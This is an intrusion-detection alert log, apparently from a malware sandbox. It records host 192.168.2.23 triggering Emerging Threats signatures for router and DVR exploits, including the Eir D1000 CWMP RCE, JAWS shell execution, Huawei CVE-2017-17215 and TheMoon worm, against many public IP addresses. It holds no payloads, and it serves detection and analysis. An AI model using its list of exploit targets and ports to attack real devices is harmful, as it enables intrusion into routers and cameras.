ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.227.42.107

Timestamp:	03/18/24-09:59:03.039017
SID:	2023548
Source Port:	52238
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 35.159.3.230

Timestamp:	03/18/24-09:59:40.609826
SID:	2030092
Source Port:	33020
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 112.160.32.251

Timestamp:	03/18/24-09:58:32.426464
SID:	2023548
Source Port:	53558
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 172.173.117.250

Timestamp:	03/18/24-09:56:59.192599
SID:	2025883
Source Port:	33678
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.247.255.214

Timestamp:	03/18/24-09:57:00.483120
SID:	2023548
Source Port:	52000
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.6.207.97

Timestamp:	03/18/24-10:00:15.351905
SID:	2023548
Source Port:	55582
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 193.52.39.138

Timestamp:	03/18/24-09:58:37.935872
SID:	2030092
Source Port:	34454
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.81.245.68

Timestamp:	03/18/24-09:59:02.008403
SID:	2023548
Source Port:	45742
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.235.204.108

Timestamp:	03/18/24-09:59:49.474999
SID:	2023548
Source Port:	42386
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 2.19.22.209

Timestamp:	03/18/24-10:00:16.452625
SID:	2025576
Source Port:	44406
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.171.97.173

Timestamp:	03/18/24-09:59:30.798076
SID:	2023548
Source Port:	59108
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 52.202.239.22

Timestamp:	03/18/24-09:58:34.011081
SID:	2030092
Source Port:	45000
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 45.58.56.251

Timestamp:	03/18/24-09:59:49.003750
SID:	2030092
Source Port:	49038
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 4.194.103.75

Timestamp:	03/18/24-09:57:00.621167
SID:	2025576
Source Port:	51540
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 136.0.97.153

Timestamp:	03/18/24-09:58:16.954802
SID:	2025883
Source Port:	36394
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 145.82.99.110

Timestamp:	03/18/24-09:58:33.096615
SID:	2023548
Source Port:	41172
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.9.53.219

Timestamp:	03/18/24-09:59:18.103259
SID:	2025576
Source Port:	43228
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 110.239.180.158

Timestamp:	03/18/24-09:58:29.497572
SID:	2023548
Source Port:	55844
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 129.208.5.252

Timestamp:	03/18/24-09:59:49.535815
SID:	2023548
Source Port:	53820
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 133.114.112.241

Timestamp:	03/18/24-09:58:29.720420
SID:	2023548
Source Port:	51424
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.232.114.38

Timestamp:	03/18/24-09:58:28.770167
SID:	2023548
Source Port:	44538
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 129.208.149.252

Timestamp:	03/18/24-09:58:13.087124
SID:	2023548
Source Port:	36684
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 129.208.5.252

Timestamp:	03/18/24-09:59:49.294040
SID:	2023548
Source Port:	53800
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.42.115.120

Timestamp:	03/18/24-09:58:24.511078
SID:	2023548
Source Port:	55768
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 212.33.198.66

Timestamp:	03/18/24-09:57:06.143242
SID:	2030092
Source Port:	47700
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 43.240.129.193

Timestamp:	03/18/24-10:00:09.583044
SID:	2025576
Source Port:	45580
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.208.117.54

Timestamp:	03/18/24-09:58:38.138501
SID:	2025576
Source Port:	43872
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 103.112.224.208

Timestamp:	03/18/24-09:56:59.546835
SID:	2030092
Source Port:	55384
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 94.101.224.57

Timestamp:	03/18/24-09:56:59.988346
SID:	2025883
Source Port:	53486
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 154.93.187.141

Timestamp:	03/18/24-09:58:15.349369
SID:	2025883
Source Port:	54086
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.14.109.57

Timestamp:	03/18/24-09:58:35.904052
SID:	2023548
Source Port:	48398
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 34.160.10.90

Timestamp:	03/18/24-09:59:11.596524
SID:	2025883
Source Port:	43916
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 211.246.105.95

Timestamp:	03/18/24-09:59:40.041933
SID:	2025576
Source Port:	54392
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 34.120.206.128

Timestamp:	03/18/24-09:59:25.810828
SID:	2030092
Source Port:	34494
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 84.72.24.228

Timestamp:	03/18/24-09:59:56.879759
SID:	2023548
Source Port:	37502
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.113.73.67

Timestamp:	03/18/24-09:58:36.642601
SID:	2023548
Source Port:	32848
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 5.9.39.198

Timestamp:	03/18/24-09:59:37.715645
SID:	2030092
Source Port:	59656
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 92.205.108.211

Timestamp:	03/18/24-09:59:37.533735
SID:	2030092
Source Port:	60176
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 52.72.238.151

Timestamp:	03/18/24-10:00:06.414367
SID:	2025576
Source Port:	52074
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 119.18.153.94

Timestamp:	03/18/24-10:00:15.307666
SID:	2030092
Source Port:	56704
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.133.243.84

Timestamp:	03/18/24-10:00:16.000292
SID:	2023548
Source Port:	53844
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.196.141

Timestamp:	03/18/24-09:58:14.841719
SID:	2018132
Source Port:	33448
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 24.127.59.199

Timestamp:	03/18/24-09:59:51.938843
SID:	2030092
Source Port:	44418
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 87.140.39.231

Timestamp:	03/18/24-09:59:44.222954
SID:	2025883
Source Port:	35432
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 83.69.204.26

Timestamp:	03/18/24-09:58:33.521883
SID:	2025883
Source Port:	37742
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 118.82.123.173

Timestamp:	03/18/24-09:59:38.155636
SID:	2030092
Source Port:	55034
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 87.239.16.181

Timestamp:	03/18/24-09:58:36.925967
SID:	2030092
Source Port:	38904
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.93.11

Timestamp:	03/18/24-09:59:03.216748
SID:	2018132
Source Port:	34220
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.59.112

Timestamp:	03/18/24-09:58:54.707056
SID:	2018132
Source Port:	33104
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 50.47.238.33

Timestamp:	03/18/24-09:58:18.025474
SID:	2023548
Source Port:	55052
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 145.82.99.110

Timestamp:	03/18/24-09:58:33.330085
SID:	2023548
Source Port:	41242
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 75.174.90.129

Timestamp:	03/18/24-09:57:08.873802
SID:	2023548
Source Port:	53562
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 83.132.201.222

Timestamp:	03/18/24-10:00:20.736673
SID:	2023548
Source Port:	33852
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 94.121.135.99

Timestamp:	03/18/24-10:00:10.025996
SID:	2030092
Source Port:	57318
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 18.134.19.143

Timestamp:	03/18/24-09:58:27.071333
SID:	2025883
Source Port:	48234
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 87.98.130.144

Timestamp:	03/18/24-10:00:04.051684
SID:	2025576
Source Port:	56758
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 35.229.111.46

Timestamp:	03/18/24-09:59:53.891048
SID:	2025883
Source Port:	43838
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.6.232.93

Timestamp:	03/18/24-09:59:31.287028
SID:	2025883
Source Port:	54602
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.25.249

Timestamp:	03/18/24-09:58:43.187670
SID:	2018132
Source Port:	35658
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 218.32.46.149

Timestamp:	03/18/24-09:59:31.505546
SID:	2025883
Source Port:	46818
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 107.178.183.125

Timestamp:	03/18/24-10:00:08.812797
SID:	2023548
Source Port:	59200
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.238.178.244

Timestamp:	03/18/24-09:56:59.493617
SID:	2023548
Source Port:	52062
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 104.103.93.208

Timestamp:	03/18/24-09:58:44.242348
SID:	2030092
Source Port:	44104
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 221.151.229.215

Timestamp:	03/18/24-09:58:15.514165
SID:	2023548
Source Port:	39226
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.228.186

Timestamp:	03/18/24-09:59:20.513365
SID:	2018132
Source Port:	49432
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.145.7

Timestamp:	03/18/24-09:58:14.424334
SID:	2018132
Source Port:	57062
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.74.136.35

Timestamp:	03/18/24-09:58:54.658709
SID:	2023548
Source Port:	50260
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 118.31.187.122

Timestamp:	03/18/24-09:58:52.060569
SID:	2030092
Source Port:	47910
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 149.71.61.26

Timestamp:	03/18/24-09:58:51.890364
SID:	2030092
Source Port:	57794
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.23.113.28

Timestamp:	03/18/24-10:00:06.105616
SID:	2023548
Source Port:	46592
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 161.34.10.131

Timestamp:	03/18/24-09:59:34.010412
SID:	2030092
Source Port:	34652
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 69.71.118.13

Timestamp:	03/18/24-10:00:03.759532
SID:	2025883
Source Port:	38474
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.228.156.82

Timestamp:	03/18/24-09:58:12.030346
SID:	2023548
Source Port:	42040
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.23.113.28

Timestamp:	03/18/24-10:00:05.881338
SID:	2023548
Source Port:	46538
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 35.229.111.46

Timestamp:	03/18/24-09:59:51.638789
SID:	2030092
Source Port:	43782
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 183.115.74.170

Timestamp:	03/18/24-10:00:01.870326
SID:	2023548
Source Port:	42300
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.54.52.206

Timestamp:	03/18/24-10:00:21.201487
SID:	2023548
Source Port:	42740
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 82.146.59.91

Timestamp:	03/18/24-10:00:02.717058
SID:	2030092
Source Port:	47954
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 130.185.73.183

Timestamp:	03/18/24-10:00:11.061090
SID:	2030092
Source Port:	52908
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 173.35.141.21

Timestamp:	03/18/24-09:59:14.383283
SID:	2023548
Source Port:	46828
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.235.85.170

Timestamp:	03/18/24-09:57:06.701934
SID:	2023548
Source Port:	58608
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.76.78.133

Timestamp:	03/18/24-09:58:22.532770
SID:	2023548
Source Port:	56164
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.109.197.145

Timestamp:	03/18/24-09:59:19.300973
SID:	2018132
Source Port:	59252
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 199.232.189.40

Timestamp:	03/18/24-09:57:00.471703
SID:	2025576
Source Port:	57904
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.56.28.126

Timestamp:	03/18/24-09:59:58.314764
SID:	2829579
Source Port:	49836
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 118.52.86.77

Timestamp:	03/18/24-10:00:08.936665
SID:	2023548
Source Port:	45010
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.254.70.15

Timestamp:	03/18/24-09:59:56.743429
SID:	2835222
Source Port:	58670
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 185.183.243.22

Timestamp:	03/18/24-09:59:25.976908
SID:	2025883
Source Port:	55596
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.77.135.134

Timestamp:	03/18/24-09:58:48.532679
SID:	2829579
Source Port:	48198
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 35.76.62.210

Timestamp:	03/18/24-09:58:43.243625
SID:	2030092
Source Port:	42560
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.204.158.207

Timestamp:	03/18/24-10:00:12.282296
SID:	2018132
Source Port:	60424
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 182.40.54.228

Timestamp:	03/18/24-09:59:14.700543
SID:	2025576
Source Port:	50268
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 190.18.192.127

Timestamp:	03/18/24-09:59:10.891933
SID:	2023548
Source Port:	44830
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 54.233.65.49

Timestamp:	03/18/24-10:00:10.210958
SID:	2030092
Source Port:	46450
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.107.234.170

Timestamp:	03/18/24-09:57:01.644914
SID:	2023548
Source Port:	55704
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 177.82.33.187

Timestamp:	03/18/24-09:57:07.733145
SID:	2023548
Source Port:	59512
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.133.48.241

Timestamp:	03/18/24-09:57:00.934599
SID:	2023548
Source Port:	54080
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 191.61.150.63

Timestamp:	03/18/24-10:00:03.618884
SID:	2027339
Source Port:	38388
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 204.117.211.14

Timestamp:	03/18/24-10:00:13.512057
SID:	2025883
Source Port:	50532
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.11.193.212

Timestamp:	03/18/24-09:57:08.286011
SID:	2023548
Source Port:	46756
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 171.33.128.234

Timestamp:	03/18/24-09:58:12.067970
SID:	2030092
Source Port:	34520
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 49.107.36.197

Timestamp:	03/18/24-09:56:57.457902
SID:	2025883
Source Port:	48850
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.213.109.77

Timestamp:	03/18/24-09:59:41.378976
SID:	2025883
Source Port:	54992
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 174.112.182.64

Timestamp:	03/18/24-09:59:25.855788
SID:	2023548
Source Port:	40426
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 124.218.48.114

Timestamp:	03/18/24-09:57:00.949006
SID:	2023548
Source Port:	36712
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 27.234.116.58

Timestamp:	03/18/24-09:59:31.095591
SID:	2023548
Source Port:	60906
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 68.3.18.73

Timestamp:	03/18/24-09:59:23.504815
SID:	2023548
Source Port:	56446
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 178.78.3.147

Timestamp:	03/18/24-09:59:16.031450
SID:	2023548
Source Port:	48352
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.241.235

Timestamp:	03/18/24-10:00:00.223997
SID:	2018132
Source Port:	44418
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.98.92

Timestamp:	03/18/24-09:59:19.268671
SID:	2018132
Source Port:	47080
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.227.196.191

Timestamp:	03/18/24-09:59:26.335211
SID:	2023548
Source Port:	55256
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

